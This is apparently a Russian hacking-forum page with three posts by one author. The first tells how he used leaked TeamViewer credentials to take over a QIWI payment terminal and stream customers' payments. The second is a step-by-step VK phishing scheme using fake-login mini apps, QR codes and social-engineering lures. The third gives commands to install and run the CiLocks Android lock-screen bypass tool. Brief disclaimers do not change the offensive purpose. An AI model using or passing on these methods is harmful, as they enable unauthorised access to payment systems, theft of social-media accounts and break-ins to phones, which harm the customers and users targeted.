Приветствую, хакеры! Платежные терминалы QIWI есть практически везде. Оплата производится через пополнение кошелька. С помощью QIWI Кошелька вы можете совершить оплату наличными в терминалах QIWI, на сайте QIWI Кошелька или с помощью приложений для социальных сетей и мобильных телефонов. Оплата через QIWI Кошелек осуществляется моментально

Qiwi – сервис для реализации многочисленных операций с виртуальной валютой. Благодаря невысокой комиссии и возможности использования денежных измерителей без прямого вывода платежная система позволяет производить стандартные финансовые платежи экономично.

Как устроен платежный QIWI Терминал

Пока на фоне идет скучный дистанционный урок, я, лазя по документам Вконтакте (через уязвимость, которая уже ни для кого уже не секрет), наткнулся на интересный файл ‘пароли от teamviewer 14’ (сейчас файл уже удален). В нем располагалась таблица с трема колонками, а именно адрес, ID и пароль от TeamViewer… Зайдя по указанным данным, я был неприятно удивлен… Передо мной предстал интерфейс платежного терминала Qiwi… «М-да уж», — подумал я, — «А люди-то там свои персональные данные вводят».

Шарим по терминалу

Начать следует, пожалуй, с характеристик терминала, которые, кстати, очень даже скромны. Средненький процессор AMD Sempron и 2 гигабайта ОЗУ, что по меркам 2021 года очень даже мало (но для терминала сойдет). Установлена на терминале Windows 7 Домашняя базовая (я думал они до сих пор на Windows XP сидят, хе-хе)). Вот скриншот:

LJgYKuL4vnI.jpg?size=807x503&quality=96&

Скриншот №1. Характеристики терминала

 

Затем я скачал и установил на терминал пакет программ (Google Chrome и т. д., а также запустил прямой эфир (стрим) через OBS. Что меня удивило, этим терминалом довольно-таки активно пользовались (и не подозревали, что их личные данные может увидеть любой желающий). В основном, конечно, пополняли свои счета мобильных телефонов, но встречались и те, что выбрасывали деньги на спортивные ставки (мне искренне жаль таких людей), а также оплачивали интернет:

vJZsz8_85Oo.jpg?size=807x641&quality=96&

Скриншот №2.

Человек оплачивает Интернет (номер замазан для сохранения конфиденциальности)

И таких было немало. Как вы понимаете для корпорации такого масштаба как ‘Qiwi’ это просто непозволительно. Я даже представить боюсь, что с этими данными может сделать социальный инженер…

Далее я попробовал запустить Skype на терминале

S5A3veSj4uI.jpg?size=807x639&quality=96&

Скриншот №3. Звонок через Skype на терминале

Кто же слил данные в Интернет?

А причиной столь банального взлома стала халатность и безответственность сотрудника (называть имя которого я не буду). Сразу же после извещения его об этом, файл был удален (для справки, он был загружен еще в марте 2020 года). Скорее всего он испугался, что обо всем станет известно его руководству и он лишится работы.

Выводы

Иногда банальная безответственность становиться причиной столь ужасных сливов. Не нужно быть профессиональным хакером, чтобы получить доступ к персональным данным нескольких десятков клиентов Qiwi. И не удивляйтесь, если в следующий раз, проходя мимо терминала Qiwi, вместо привычного интерфейса Qiwi вы увидите разложенным пасьянс ‘Косынка’ или открытое видео непристойного содержания.

Что необходимо предпринять Qiwi, чтобы избежать такой ситуации в будущем?

Корпорации Qiwi необходимо надежнее выбирать своих посредников, а компаниям, занимающимся, установкой и настройкой оборудования выбирать только квалифицированных работников.

 

 




#28261 Новый способ взлома ВКонтакте!

Отправлено по roguevad   11 Сентябрь 2021 - 12:43 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать о новом способе взлома ВКонтакте. Не многие пользователи знают, что в VK есть функция создания QR-кодов. Хотя добавили ее давненько, не каждый слышал и пользовался этим, в том числе в теневом сегменте это нововведение почему-то недооценили. Один из вариантов использования фичи — продуманный фишинг. Жертва видит логотип соцсети, и траст автоматически идет вверх. Кушать подано!

 

1. Генерируем фишинговую ссылку: В сети много слитых скриптов фишинг-панелей.

2. Создаем VK MINI APP с фейковой авторизацией VK, такую штуку можно заказать примерно за 1.000-2.000₽.

3. Переходим по ссылке и создаем QR-код. В разделе «Ссылка» вставляем линк на MINI APP.

4. Рассылаем QR-коды. СИ — ключевой момент. «Привет, дарю тебе стикеры» — сомнительная тема. Добавьте больше креатива.

5. PROFIT!

 

Если некоторые уже понимают, что нельзя переходить по всем ссылкам подряд (даже если домен — vk.cc), то QR-коды — лес темный.

Рекомендую попробовать тем, кому интересна тема QR-кодов и способах взлома с их помощью.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#29405 Обход пароля экрана блокировки Android

Отправлено по roguevad   16 Июнь 2022 - 01:04 в Делимся опытом.

Приветствую, хакеры! В данной небольшой статье я хочу рассказать о том, как вы можете обходить пароль экрана блокировки на Android. Взломать заблокированное устройство - задача не из легких.

Очень важно проверить некоторые приложения и инструменты, которые могут служить этой цели.

 

И так приступим!

 

Прежде всего, нам нужно загрузить инструмент Cilocks (обход пароля Android), поэтому введите следующие команды на своем терминале Linux или Termux.

 

   $ git clone https://github.com/t...337/CiLocks.git

   $ cd CiLocks

   $ chmod +x CiLocks

   $ sudo bash cilocks

 

Теперь подключите свой телефон Android к компьютеру с Linux и выберите нужный вариант.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.